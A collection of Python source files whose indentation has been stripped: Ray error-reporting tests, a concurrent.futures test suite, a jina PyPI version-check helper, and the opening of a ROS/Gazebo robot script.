arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
are still running, this `ray.get` call should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("This test does not work yet.")
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
are still running, this `ray.get` call should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
def test_version_mismatch(shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
wait_for_errors(ray_constants.VERSION_MISMATCH_PUSH_ERROR, 1)
# Reset the version.
ray.__version__ = ray_version
def test_warning_monitor_died(shutdown_only):
ray.init(num_cpus=0)
time.sleep(1) # Make sure the monitor has started.
# Cause the monitor to raise an exception by pushing a malformed message to
# Redis. This will probably kill the raylets and the raylet_monitor in
# addition to the monitor.
fake_id = 20 * b"\x00"
malformed_message = "asdf"
redis_client = ray.worker.global_worker.redis_client
redis_client.execute_command(
"RAY.TABLE_ADD", ray.gcs_utils.TablePrefix.HEARTBEAT_BATCH,
ray.gcs_utils.TablePubsub.HEARTBEAT_BATCH, fake_id, malformed_message)
wait_for_errors(ray_constants.MONITOR_DIED_ERROR, 1)
def test_export_large_objects(ray_start_regular):
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 1)
@ray.remote
class Foo(object):
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 2)
def test_warning_for_infeasible_tasks(ray_start_regular):
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo(object):
pass
# This task is infeasible.
f.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
# This actor placement task is infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 2)
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
@ray.remote
class Foo(object):
pass
# The actor creation should be infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
class Foo(object):
def __init__(self):
time.sleep(1000)
[Foo.remote() for _ in range(num_cpus * 3)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
[Foo.remote() for _ in range(num_cpus)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 2)
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def g():
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
time.sleep(1)
ray.get(f.remote())
[g.remote() for _ in range(num_cpus * 4)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
@pytest.fixture
def ray_start_two_nodes():
# Start the Ray processes.
cluster = Cluster()
for _ in range(2):
cluster.add_node(
num_cpus=0,
_internal_config=json.dumps({
"num_heartbeats_timeout": 40
}))
ray.init(redis_address=cluster.redis_address)
yield cluster
# The code after the yield will run as teardown code.
ray.shutdown()
cluster.shutdown()
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_two_nodes):
cluster = ray_start_two_nodes
cluster.wait_for_nodes()
client_ids = {item["ClientID"] for item in ray.global_state.client_table()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 2, timeout=40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_client_ids = {
item["message"].split(" ")[5]
for item in relevant_errors(ray_constants.REMOVED_NODE_ERROR)
}
assert client_ids == warning_client_ids
def test_raylet_crash_when_get(ray_start_regular):
nonexistent_id = ray.ObjectID(_random_string())
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(Exception, match=r".*Connection closed unexpectedly.*"):
ray.get(nonexistent_id)
thread.join()
|
test_futures.py
|
import os
import subprocess
import sys
import threading
import functools
import contextlib
import logging
import re
import time
import gc
import traceback
from StringIO import StringIO
from test import test_support
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future, BrokenExecutor)
from concurrent.futures.thread import cpu_count
try:
import unittest2 as unittest
except ImportError:
import unittest
def reap_threads(func):
"""Use this function when threads are being used. This will
ensure that the threads are cleaned up even when the test fails.
If threading is unavailable this function does nothing.
"""
@functools.wraps(func)
def decorator(*args):
key = test_support.threading_setup()
try:
return func(*args)
finally:
test_support.threading_cleanup(*key)
return decorator
# Executing the interpreter in a subprocess
def _assert_python(expected_success, *args, **env_vars):
cmd_line = [sys.executable]
if not env_vars:
cmd_line.append('-E')
# Need to preserve the original environment, for in-place testing of
# shared library builds.
env = os.environ.copy()
# But a special flag can be set to override this -- in that case, the
# caller is responsible for passing the full environment.
if env_vars.pop('__cleanenv', None):
env = {}
env.update(env_vars)
cmd_line.extend(args)
p = subprocess.Popen(cmd_line, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
try:
out, err = p.communicate()
finally:
subprocess._cleanup()
p.stdout.close()
p.stderr.close()
rc = p.returncode
err = strip_python_stderr(err)
if (rc and expected_success) or (not rc and not expected_success):
raise AssertionError(
"Process return code is %d, "
"stderr follows:\n%s" % (rc, err.decode('ascii', 'ignore')))
return rc, out, err
def assert_python_ok(*args, **env_vars):
"""
Assert that running the interpreter with `args` and optional environment
variables `env_vars` is ok and return a (return code, stdout, stderr) tuple.
"""
return _assert_python(True, *args, **env_vars)
def strip_python_stderr(stderr):
"""Strip the stderr of a Python process from potential debug output
emitted by the interpreter.
This will typically be run on the result of the communicate() method
of a subprocess.Popen object.
"""
stderr = re.sub(r"\[\d+ refs\]\r?\n?$".encode(), "".encode(), stderr).strip()
return stderr
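# Illustrative sketch of what gets stripped (debug builds of CPython 2 append a
# refcount line to stderr):
#     strip_python_stderr(b"some warning\n[18434 refs]\n")  ->  b"some warning"
# On a non-debug build the input is simply whitespace-stripped and returned.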
@contextlib.contextmanager
def captured_stderr():
"""Return a context manager used by captured_stdout/stdin/stderr
that temporarily replaces the sys stream *stream_name* with a StringIO."""
logging_stream = StringIO()
handler = logging.StreamHandler(logging_stream)
logging.root.addHandler(handler)
try:
yield logging_stream
finally:
logging.root.removeHandler(handler)
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=IOError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
def mul(x, y):
return x * y
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
class ExecutorMixin:
worker_count = 5
def setUp(self):
self.t1 = time.time()
try:
self.executor = self.executor_type(max_workers=self.worker_count)
except NotImplementedError:
e = sys.exc_info()[1]
self.skipTest(str(e))
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
dt = time.time() - self.t1
if test_support.verbose:
print("%.2fs" % dt)
self.assertLess(dt, 60, "synchronization issue: test lasted too long")
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
class ExecutorShutdownTest(unittest.TestCase):
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import %s
from time import sleep
from test_futures import sleep_and_print
t = %s(5)
t.submit(sleep_and_print, 1.0, "apple")
""" % (self.executor_type.__name__, self.executor_type.__name__))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), "apple".encode())
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_threads_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(3):
self.executor.submit(acquire_lock, sem)
self.assertEqual(len(self.executor._threads), 3)
for i in range(3):
sem.release()
self.executor.shutdown()
for t in self.executor._threads:
t.join(5)
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join(5)
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
gc.collect()
gc.collect()
for t in threads:
t.join(5)
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
gc.collect()
gc.collect()
for t in threads:
self.assertRegexpMatches(t.name, r'^SpecialPool_[0-4]$')
t.join(5)
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
gc.collect()
gc.collect()
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegexpMatches(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join(5)
class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes:
p.join(5)
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes:
p.join(5)
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
del executor
gc.collect()
gc.collect()
queue_management_thread.join(5)
for p in processes:
p.join(5)
class WaitTests(unittest.TestCase):
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=1.5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
fs = set(self.executor.submit(future_func) for i in range(100))
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setcheckinterval(oldswitchinterval)
class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests):
pass
class AsCompletedTests(unittest.TestCase):
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
future1 = self.executor.submit(time.sleep, 2)
completed = [f for f in futures.as_completed([future1,future1])]
self.assertEqual(len(completed), 1)
class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests):
pass
class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests):
pass
class ExecutorTest(unittest.TestCase):
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(next(i), (0, 1))
self.assertEqual(next(i), (0, 1))
self.assertRaises(ZeroDivisionError, next, i)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 3],
timeout=1.5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaises(ValueError) as cm:
self.executor_type(max_workers=number)
assert str(cm.exception) == "max_workers must be greater than 0"
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertEqual(len(finished), 10)
def test_default_workers(self):
executor = self.executor_type()
self.assertEqual(executor._max_workers,
(cpu_count() or 1) * 5)
def test_thread_initializer(self):
initialized = []
def initializer(i):
initialized.append(i)
executor = self.executor_type(initializer=initializer, initargs=(1,))
executor.submit(time.sleep, 1)
executor.submit(time.sleep, 1)
executor.shutdown(wait=True)
self.assertEqual(initialized, [1, 1])
def test_broken_thread_initializer(self):
def broken_initializer(i):
raise ValueError()
executor = self.executor_type(initializer=broken_initializer)
with self.assertRaises(BrokenExecutor):
executor.submit(time.sleep, 1).result()
with self.assertRaises(BrokenExecutor):
executor.submit(time.sleep, 1)
executor.shutdown(wait=True)
def test_saturation(self):
executor = self.executor_type(4)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(15 * executor._max_workers):
executor.submit(acquire_lock, sem)
self.assertEqual(len(executor._threads), executor._max_workers)
for i in range(15 * executor._max_workers):
sem.release()
executor.shutdown(wait=True)
def test_idle_thread_reuse(self):
executor = self.executor_type()
executor.submit(mul, 21, 2).result()
time.sleep(0.001)
executor.submit(mul, 6, 7).result()
time.sleep(0.001)
executor.submit(mul, 3, 14).result()
self.assertEqual(len(executor._threads), 1)
executor.shutdown(wait=True)
class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest):
pass
class FutureTests(unittest.TestCase):
def test_done_callback_with_result(self):
callback_result = [None]
def fn(callback_future):
callback_result[0] = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result[0])
def test_done_callback_with_exception(self):
callback_exception = [None]
def fn(callback_future):
callback_exception[0] = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception[0].args)
def test_done_callback_with_cancel(self):
was_cancelled = [None]
def fn(callback_future):
was_cancelled[0] = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled[0])
def test_done_callback_raises(self):
with captured_stderr() as stderr:
raising_was_called = [False]
raising_old_style_was_called = [False]
fn_was_called = [False]
def raising_fn(callback_future):
raising_was_called[0] = True
raise Exception('doh!')
def raising_old_style_fn(callback_future):
raising_old_style_was_called[0] = True
class OldStyle: # Does not inherit from object
def __str__(self):
return 'doh!'
raise OldStyle()
def fn(callback_future):
fn_was_called[0] = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(raising_old_style_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(raising_old_style_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
self.assertIn('OldStyle: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = [None]
def fn(callback_future):
callback_result[0] = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result[0])
def test_done_callback_already_failed(self):
callback_exception = [None]
def fn(callback_future):
callback_exception[0] = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception[0].args)
def test_done_callback_already_cancelled(self):
was_cancelled = [None]
def fn(callback_future):
was_cancelled[0] = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled[0])
def test_repr(self):
self.assertRegexpMatches(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+L? state=pending>')
self.assertRegexpMatches(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+L? state=running>')
self.assertRegexpMatches(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+L? state=cancelled>')
self.assertRegexpMatches(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+L? state=cancelled>')
self.assertRegexpMatches(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+L? state=finished raised IOError>')
self.assertRegexpMatches(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+L? state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=IOError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(IOError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
IOError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = IOError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), IOError))
def test_old_style_exception(self):
class OldStyle: # Does not inherit from object
def __str__(self):
return 'doh!'
callback_exc_info = [None]
def fn(callback_future):
callback_exc_info[0] = callback_future.exception_info()
f = Future()
f.add_done_callback(fn)
try:
raise OldStyle()
except OldStyle:
want_exc_info = sys.exc_info()
f.set_exception_info(*want_exc_info[1:])
self.assertEqual(f.exception_info(), want_exc_info[1:])
self.assertEqual(callback_exc_info[0], want_exc_info[1:])
try:
f.result()
except OldStyle:
got_exc_info = sys.exc_info()
else:
self.fail('OldStyle exception not raised')
self.assertEqual(got_exc_info[:2], want_exc_info[:2])
got_tb = traceback.extract_tb(got_exc_info[2])
want_tb = traceback.extract_tb(want_exc_info[2])
self.assertEqual(got_tb[-len(want_tb):], want_tb)
@reap_threads
def test_main():
try:
test_support.run_unittest(ProcessPoolExecutorTest,
ThreadPoolExecutorTest,
ProcessPoolWaitTests,
ThreadPoolWaitTests,
ProcessPoolAsCompletedTests,
ThreadPoolAsCompletedTests,
FutureTests,
ProcessPoolShutdownTest,
ThreadPoolShutdownTest)
finally:
test_support.reap_children()
if __name__ == "__main__":
test_main()
|
helper.py
|
import json
import sys
import threading
from packaging.version import Version
from urllib.request import Request, urlopen
import pkg_resources
from rich import print
from rich.panel import Panel
def _version_check(package: str = None, github_repo: str = None):
try:
if not package:
package = vars(sys.modules[__name__])['__package__']
if not github_repo:
github_repo = package
cur_ver = Version(pkg_resources.get_distribution(package).version)
req = Request(
f'https://pypi.python.org/pypi/{package}/json',
headers={'User-Agent': 'Mozilla/5.0'},
)
with urlopen(
req, timeout=1
) as resp: # 'with' is important to close the resource after use
j = json.load(resp)
releases = j.get('releases', {})
latest_release_ver = max(
Version(v) for v in releases.keys() if '.dev' not in v
)
if cur_ver < latest_release_ver:
print(
Panel(
f'You are using [b]{package} {cur_ver}[/b], but [bold green]{latest_release_ver}[/] is available. '
f'You may upgrade it via [b]pip install -U {package}[/b]. [link=https://github.com/jina-ai/{github_repo}/releases]Read Changelog here[/link].',
title=':new: New version available!',
width=50,
)
)
except Exception:
# No network, the request is too slow, or PyPI is down.
pass
def is_latest_version(package: str = None, github_repo: str = None) -> None:
"""Check if there is a latest version from Pypi, set env `NO_VERSION_CHECK` to disable it.
:param package: package name if none auto-detected
:param github_repo: repo name that contains CHANGELOG if none then the same as package name
"""
threading.Thread(target=_version_check, args=(package, github_repo)).start()
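# Minimal usage sketch (the package name below is illustrative and the call
# needs network access; per the docstring, callers are expected to honour the
# `NO_VERSION_CHECK` environment variable before invoking it):
#
#     is_latest_version(package='jina', github_repo='jina')
#
# The PyPI lookup runs in a background thread, so the caller is never blocked
# by the network request.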
|
base_line.py
|
import time
import random
import os
import cv2 as cv
import logging
import numpy as np
import matplotlib.pyplot as plt
import threading
import math
from squaternion import Quaternion
import argparse
import rospy
from gazebo_msgs.msg import ModelStates
from geometry_msgs.msg import Twist, Point, PoseStamped
from gazebo_msgs.srv import SetModelState
class Robot:
def __init__(self, name):
self.pos = Point()
self.orientation = 0
self.linear_vel = 0
self.angular_vel = 0
self.name = name
